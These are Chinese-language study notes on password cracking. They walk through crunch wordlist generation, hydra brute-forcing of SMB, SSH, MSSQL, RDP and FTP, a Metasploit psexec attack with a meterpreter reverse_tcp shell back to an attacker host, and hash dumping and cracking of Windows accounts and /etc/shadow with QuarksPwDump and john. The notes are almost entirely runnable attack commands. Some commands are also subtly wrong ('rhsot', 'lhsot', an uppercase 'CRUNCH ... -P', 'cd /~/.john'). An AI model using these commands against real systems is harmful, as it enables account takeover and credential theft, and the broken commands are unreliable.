網絡安全學習筆記：口令破解

口令破解

明文傳輸

HTTP、FTP、Telnet等傳輸的數據流都是明文，包括口令認證信息

破解方式：在線破解、離線破解 在線破解：賬號密碼---需要認證 用戶名已知，用戶名未知---密碼未知 用戶名未知，密碼已知

離線破解：密文還原---明文

1、暴力破解

密碼生成工具  crunch  (kali自帶)
    crunch 1 8 1234567890abcdefghijklmnopqrstuvwxyz
cupp    需要安裝    apt-get install cupp

 

2、crunch命令格式

crunch <min-len> <max-len> [<charset string>] [options]
min-len設定密碼的最小長度
max-len設定密碼的最大長度
charset string字符集
-b指定文件輸出的大小，避免字典文件過大
-c指定文件輸出的行數，記包含密碼的個數
-d限制相同元素出現的次數
-e定義停止字符，即到該字符串就停止生成
-f調用庫文件（/usr/share/crunch/charset.lst）
-i改變輸出格式，即aaa,aab -> aaa,baa 
-o將密碼保存到指定文件
-q讀取密碼文件，即讀取pass.txt
-r定義重復一個字符串就重新開始
-s指定一個開始的字符
-t指定密碼輸出的格式
-u禁止打印百分比
-z壓縮生成的字典文件，支持gzip,bzip2,lzma,7z
-l生成特殊字符
-p指定生成元素
​
特殊字符
%代表數字
^代表特殊符號
@代表小寫字母
,代表大寫字母
​
生成1-8位密碼字典，字符集合位小寫字母，從a 開始到zzzzzzzz結束
crunch 1 8
生成1-6位的密碼字典，字符集合位[abcdefg],從a 開始到gggggg結束
crunch 1 6 abcdefg
生成3 位密碼字典，字符集合[ab ],從a 開始到 [ ]
生成指定字符串，比如生日的日期
crunch 8 8 -t 199307%% -e 19930731
生成元素的組合，比如123.com
crunch 7 7 -t %%%.com -s 111.com -e 123.com
在字典中輸出特殊字符
crunch 3 3 abc -t @@@ -l @aa
以元素組合生成字典
zhangsan|1993|0701
CRUNCH 4 4 -P AJEST 1992 0701
保存字典文件
crunch 11 11 -t 1700010%%%% -b 20mb -o START
自定義字符集合
將自帶字典進行備份
創建自定義字符集合[*.com] 字典文件
crunch 5 5 -f charset.lst test -t @.com

 

3、windows口令破解

在kali下使用hydra
-l 指定一個用戶名      -p指定一個密碼        -P指定密碼字典
-L 指定用戶名字典      -vV顯示爆破細節       -o保存爆破結果
-f找到正確密碼就停止爆破
-e n(null)、s(same)、r(反向)    -e nsr
-t 線程
hydra -l admin -P ../dic/pwd.dic 192.168.131.128 smb -vV -f -e nsr
​
​
破解密碼后使用msfconsole進行連接
use exploit/windows/smb/psexec_psh
set payload windows/meterpreter/reverse_tcp
show options
set rhsot 192.168.131.128
set SMBUSER admin
set SMBPASS 123456
set lhsot 172.16.13.42
exploit
​
​
windows賬戶hash值破解
除了可以遠程爆破windows密碼，我們還可以從本地破解windows密碼。
本地Windows 賬戶破解主要有兩種方式
從內存中讀取windows 密碼
我們可以用getpass 直接從Windows 系統內存中讀取用戶數據
    Windows hash 值破解
    Windows hash 值破解一共有兩步操作。
        首先我們使用QuarkPwDump 工具讀取（導出）Windows 賬戶密碼hash 值，   -t指定使用工具    -o結果導出到
[C:\Users\Administrator\Desktop\QuarksPwDump.exe -dhl -t JOHN -o win2008.hash]
然后在使用 john 工具破解
cd /~/.john
​
john win2008.hash --format=NT --wordlist=/root/dic/winPass.dic
[john --show win2k8.hash --format=NT]

 

4、linux口令破解

linux 口令破解
linux 口令破解，也分遠程破解和和本地破解。
遠程破解主要是爆破ssh 服務，屬於在線密碼攻擊。
本地破解需要拿到linux 的shadow 文件，進行hash 值破解，屬於離線密碼攻擊
​
破解ssh 服務
我們使用hydra 攻擊破解ssh 服務，hydra 攻擊已經自動集成在kali 虛擬機中。
命令如下：
hydra -L /root/dic/user.dic -P /root/dic/winPass.dic 127.0.0.1 ssh -e nsr -vV -o 127.ssh
​
離線破解linux密碼(在kali下)
cd /~/.john
    cp  /etc/shadow ./shadow
    john shadow
    查看john --show shadow

 

5、服務口令破解

破解MSSQL 口令
hydra -l sa -P /root/dic/test_pwd.dic 192.168.1.150 mssql -vV
​
破解RDP 口令
hydra -l administrator -P /root/dic/test_pwd.dic 192.168.1.150 rdp -vV
​
破解FTP 口令
hydra -L /root/dic/test_user.dic -P /root/dic/test_pwd.dic 192.168.1.150 ftp -vV